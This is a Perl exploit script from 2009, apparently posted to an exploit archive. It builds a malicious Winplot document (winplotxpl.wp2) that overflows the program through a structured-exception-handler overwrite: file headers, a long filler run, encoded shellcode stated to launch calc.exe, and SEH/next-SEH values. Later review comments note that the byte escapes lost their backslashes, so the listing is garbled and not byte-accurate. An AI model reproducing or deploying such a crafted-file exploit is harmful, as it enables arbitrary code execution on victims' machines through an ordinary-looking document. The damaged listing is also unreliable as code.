
winplot-overflow.txt

Posted on 21 September 2009

# Author: Rick
# Email: rick2600@hotmail.com
#
# Software: http://math.exeter.edu/rparris/peanut/wp32z.exe
# Version: Compiled in 19 sept 2009
#
# Exec: calc.exe
# Tested on: Windows XP SP2 EN,PT-BR, Vista
# Greeting: Hisok4, All my friends
#
# Purpose: builds one Winplot document, winplotxpl.wp2, by concatenating
#   $header1 . $junk . $shellcode . $junk2 . $neh . $seh . $header2
# and writes it to the current directory. The two header blobs bracket an
# oversized run of filler plus the author's payload.
#
# NOTE(review): the byte escapes in this listing appear to have lost their
# backslashes in extraction ("x49" rather than an escaped byte), so every
# quoted string below is literal text as shown. The listing is kept exactly
# as found and is not byte-accurate.
#
# NOTE(review): for triage, the visible shape of the generated file is a
# multi-kilobyte run of one repeated character sitting between records that
# otherwise look like an ordinary document. The durable fix is on the
# application side, in how the parser bounds the field this run occupies;
# the page does not identify that field or a fixed version.

# Leading part of the generated file. The blob contains the byte sequences
# for the strings "Courier New", "Symbol" and "Times", so it presumably
# mirrors the settings records of a normal Winplot document; not verified
# against the file format.
$header1 = "x49x03x00x00x19x00x00x00x30x00x00x00x2ex00x00x00". "x0ex02x00x00x0ex02x00x00x00x00x00x00x01x00x00x00". "x3dx00x00x00xd9xffxffxffx2cx01x00x00x64x00x00x00". "x64x00x00x00x00x00x00x00x00x00x00x00x0ax00x00x00". "x0fx00x00x00x2bxd0x28x01x49x1ex29x01x00x00x00x00". "x0cx00x00x00x0ax00x00x00x0ax00x00x00x08x00x00x00". "x0cx00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00". "x0ax00x00x00x0ax00x00x00xf0xffxffxffx00x00x00x00". "x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00". "x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00". "x00x00x00x00x90x01x00x00x00x00x00x02x08x02x01x31". "x53x79x6dx62x6fx6cx00x20x4ex65x77x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00". "x90x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72". "x69x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00xf5xffxffxff". "x00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00". "x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20". "x4ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00xf0xffxffxffx00x00x00x00". "x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00". "x08x02x01x02x54x69x6dx65x73x00x72x20x4ex65x77x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00". "x00x00x00x00x90x01x00x00x00x00x00x00x08x02x01x02". "x54x69x6dx65x73x00x72x20x4ex65x77x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00". "x90x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72". "x69x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00xf3xffxffxff". "x00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00". "x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20". "x4ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00xf3xffxffxffx00x00x00x00". "x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00". "x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00". "x00x00x00x00x90x01x00x00x00x00x00x00x08x02x01x31". "x43x6fx75x72x69x65x72x20x4ex65x77x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x04xf2x12x00xbdx9fx51x00". "x0cx30x54x00x00x00x00x00x00x04xf2x12x00xbdx9fx51". "x00x0cx30x54x00x00x00x00x00x00x04xf2x12x00xbdx9f". "x51x00x0cx30x54x00x00x00x00x00x00x04xf2x12x00xbd". "x9fx51x00x0cx30x54x00x00x00x00x00x00x01x00x04x00". "x06x00x00x00x04x00x06x00x05x00x16x00x18x00x00x00". "x15x00x04x00x00x00x00x00x00x00x00x00x00x00xffxff". "xffx00xffx00xffx00xffxffx00x00xffx00x00x00x00xbf". "x3fx00x00x00xffx00x00x7fx7fx00xffx7fx00x00xffx00". "x7fx00xa0x2fx00x00x00xffxffx00xbfxbfx7fx00x7fx00". "x7fx00x20xffx00x00xffx7fx7fx00x87x87x00x00x00x3c". "xa0x00xe0xe0xe0x00xc0xc0xc0x00xa0xa0xa0x00x80x80". "x80x00x60x60x60x00x40x40x40x00xbfx00x3fx00x7exde". "xffx00xffxccxccx00xffx7exdex00xffxdex7ex00xdexff". "x7ex00x7exffxdex00xffxffxbfx00xffxbfxffx00xbfxff". "xffx00xffxffxdex00xffxdexffx00xdexffxffx00xb1xde". "xd4x00xb1xd4xdex00xd4xb1xdex00xd4xdexb1x00xdexb1". "xd4x00xdexd4xb1x00xbfxf1xdex00xbfxdexf1x00xdexf1". "xbfx00xdexbfxf1x00xf1xdexbfx00xf1xbfxdex00xffx96". "xeax00x96xeaxffx00xccxccxccx00xc8x70x00x00xdexcd". "x00x00xdex68x20x00x14x82x28x00xc0x00xa0x00xd4x28". "x28x00x50x84xb0x00x64xa0xc8x00x14x64x14x00x05x00". "x7dx00x00x00x01x00x01x00x01x00x0ax00x05x00x02x00". "x00x00x64x00x03x00x3cx00x07x00x0fx00x01x00x03x00".
"x08x00x0cx00x1ex00x01x00x00x00x00x00x00x00x00x00". "x00x00x01x00x03x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x01x00x70x00x0cx00". "x14x00x00x00x00x00x7bx03xffxffx32x00x00x00xb0x00". "x01x00x00x00x00x00x01x00x00x00xffxffxffxffx00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x01x01x00x00x00x00x01x01x01x00x00x00x00x00". "x00x01x00x00x01x01x01x01x01x01x01x01x01x01x01x01". "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00xa0x01x40x00x00". "x00x00x00x00x00xa0x01xc0x00x00x00x00x00x00x00xa0". "x01x40x66x33x44xe9x5cx36x43x94x01xc0x66x33x44xe9". "x5cx36x43x94x01x40x00x00x00x00x00x00x00x80xffx3f". "x00x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00". "x00x80xffx3fx00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00xf0x04x40x00x00x00x00x00x00x00xa0". "x05x40x00x00x00x00x00x00x00xf0x04x40x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x80x00x40x00x00x00x00x00x00x00x80x00x40x00x00". "x00x00x00x00x00x80x00x40x00x30x33x33x33x33x33xb3". "xfex3fx00xd0xccxccxccxccxccxccxfbx3fx00x00x00x00". "x00x00x00xa0x01x40x00x00x00x00x00x00x00x00x00x00". "x00xa8x5exdfx9bx4fx77xd6xfbx3fx00x48xe1x7ax14xae". "x47x81xffx3fx00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00xc0". "xfex3fx7fx00x20x62x7ex00x00x00x00x00xf0xf4x12x00". "x01x00x00x00x00x00x00x00x80xf6x12x00x60x48x40x00". "x38x03x03x00xf0xf4x12x00x78xc0x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00xa0x01x40x00x00". "x00x00x00x00x00xfax08x40x00xd0xccxccxccxccxccxcc". "xfbx3fx00x00x00x00x00x00x40x9cx0cx40x00x00x00x00". "x00x00x00xc8x07x40x00x00x00x00x00x00x00x96x06x40". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x80xffx3fx00x00x00x00x00x00x00xc8x05x40x00x00".
"x00x00x00x00x00xa0x02x40x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00xa0x01x40x00x00x00x00". "x00x00x00xfax08x40x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00xa0x01x40x00x00x00x00x00x00". "x00xc8x05x40x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00xa0x01x40x00x00x00x00x00x00x00xc8". "x05x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x80x00x40x00x00x00x00x00x00". "x00x80x00x40x00x00x00x00x00x00x00x80x00x40x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00xa0x01x40x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "xccx00x00x00xffxffxffxffx00x00x00x00x01x00x14x00". "x01x00x0fx00x05x00x16x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x01x00x14x00x32x00x00x00". "x01x00x00x00x01x01x01x00x00x00x00x00x00x00xd0xcc". "xccxccxccxccxccxfcx3fx00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x80xffx3fx00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x80xffx3fx24". "x00x24x00x24x00x96x00x96x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x80xffx3fx00x00x00x00x00x00x00x80xff". "x3fx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00". "x80xffx3fx00x00x00x00x00x00x00x80xffx3fx00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x80xffx3fx00x00x00x00x00x00x00x80xffx3fx00". "x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xb8". "x1cx8ex2dx54xdex73x9exf9x3fx00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x18x00x01". "x00x00x00x30x75xafx00x34x76xafx00x38x77xafx00x3c". "x78xafx00x40x79xafx00x44x7axafx00x48x7bxafx00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x04". "xa7xafx00x00x00x00x00x00x00x00x00x54x8exafx00x00". "x00x00x00x5cx90xafx00x74xa3xafx00x00x00x00x00x00". "x00x00x00x01x00x80x97xcdxaax1fxf8xaexe6x00x40x4c". "x8dx4exf3x22x84x33xb8xfbx3fx00x00x00x00x00x00x00". "x00x00x00xccx00x00x00x00x00x00x00x00x00x00x00x00". "x0cxe8xd1x19x4fxc1x05xc9x00x40x00x00x01x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x18x00x01x00x00x00x0dx00x04x00xffxff". "x00x00x00x00x00x00x01x00x00x01x00x00x0bx00";

# Trailing part of the generated file, appended after the overwritten
# region. It contains the byte sequence for the text "xx+yy=13" twice,
# which looks like a stored equation; presumably the remaining document
# records, unverified.
$header2 = "x00x01x00x00x09x00x78x78". "x2bx79x79x3dx31x33x00x01x00x00x01x00x00x00x49x54". "x00x10x49x54x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x02x00x78x00x02x00x79x00x02x00x7ax00x00x00". "x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0". "x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00". "x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0". "x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00". "x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00". "x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0". "x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00". "x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0".
"x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00". "x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00". "x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0". "x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00". "x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0". "x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00". "x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00". "x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00x00xa0". "x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x9bx4a". "xbbxa2x58x54xf8xadx00x40x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x80x97xcdxaa". "x1fxf8xaexe6x00x40x4cx8dx4exf3x22x84x33xb8xfbx3f". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00". "x00x00x00x00x00xa0x02x40x00x00x00x00x00x00x00xa0". "x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00". "x00x00x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40". "x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00". "x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00". "x00x00x00x00x00xa0x02x40x00x00x00x00x00x00x00xa0". "x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00". "x00x00x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40". "x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00". "x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00". "x00x00x00x00x00xa0x02x40x00x00x00x00x00x00x00xa0".
"x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00". "x00x00x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40". "x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00". "x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00". "x00x00x00x00x00xa0x02x40xb0x8exaax00x0cx00x00x00". "x00x00x00x00xf0xf4x12x00x40xb0x8exaax00x0cx00x00". "x00x00x00x00x00xf0xf4x12x00x40xb0x8exaax00x0cx00". "x00x00x00x00x00x00xf0xf4x12x00x40x00x00x00x00x00". "x00x01x00x00x00x00x78x78x2bx79x79x3dx31x33x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x7dx59x00x00x10x49x54x00x10x49x54x00x00". "x00x00x00xbfx00x3fx00xaax55x77x03x65xa4x24x9ex01". "xc0x00x00x00x00x00x00x00xa0x01x40x66x33x44xe9x5c". "x36x43x94x01xc0x10x89xbbxecxc1xdax67x92x01x40xf3". "xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90". "x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72x69". "x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00xfexffx00x00x00x00x00x00x00x00x00x01x00x00";

# The author's payload; the header comment describes it only as
# "Exec: calc.exe". After a short leading stub the listed values all fall
# in the printable-ASCII range, which is consistent with an encoded payload
# (not decoded or verified here).
$shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49". "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36". "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34". "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41". "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54". "x42x50x42x50x42x30x4bx38x45x44x4ex43x4bx58x4ex57". "x45x50x4ax37x41x50x4fx4ex4bx38x4fx44x4ax31x4bx38". "x4fx55x42x32x41x30x4bx4ex49x34x4bx58x46x43x4bx58". "x41x50x50x4ex41x53x42x4cx49x49x4ex4ax46x38x42x4c". "x46x47x47x30x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e". "x46x4fx4bx43x46x55x46x52x46x50x45x47x45x4ex4bx58". "x4fx35x46x42x41x50x4bx4ex48x36x4bx58x4ex30x4bx34". "x4bx48x4fx35x4ex51x41x30x4bx4ex4bx38x4ex31x4bx48". "x41x30x4bx4ex49x38x4ex35x46x32x46x50x43x4cx41x33". "x42x4cx46x36x4bx48x42x54x42x33x45x38x42x4cx4ax57". "x4ex50x4bx48x42x54x4ex30x4bx38x42x57x4ex41x4dx4a". "x4bx48x4ax46x4ax30x4bx4ex49x50x4bx58x42x48x42x4b". "x42x50x42x30x42x30x4bx38x4ax36x4ex53x4fx35x41x43".
"x48x4fx42x46x48x55x49x48x4ax4fx43x58x42x4cx4bx57". "x42x35x4ax36x42x4fx4cx58x46x50x4fx55x4ax46x4ax49". "x50x4fx4cx58x50x50x47x35x4fx4fx47x4ex43x46x41x46". "x4ex46x43x36x42x30x5a";

# Two short author-chosen constants placed directly after the padded region.
# The names suggest the two fields of a structured-exception-handler record;
# inferred from naming only, confirm against the author's notes.
$seh = "xe8x4exf6xffxff";
$neh = "x4dx23x50x00";

# Filler that precedes the payload: one string repeated 2309 times.
$junk = "x41" x 2309;
# Filler that follows the payload. The repeat count shrinks as the payload
# grows, so payload plus this filler always totals 2327 repeats' worth and
# $neh/$seh stay at a constant distance from the end of $junk.
$junk2 = "x42" x (2327-length($shellcode));

# Final layout of the generated file, in write order.
$buffer = $header1.$junk.$shellcode.$junk2.$neh.$seh.$header2;

print "crafted file: winplotxpl.wp2 ";
# Writes (truncating) winplotxpl.wp2 in the current directory through a
# bareword filehandle. The result of open is not checked, so a failure to
# create the file goes unreported.
open (FILE, ">winplotxpl.wp2");
print FILE $buffer;
close(FILE);

 
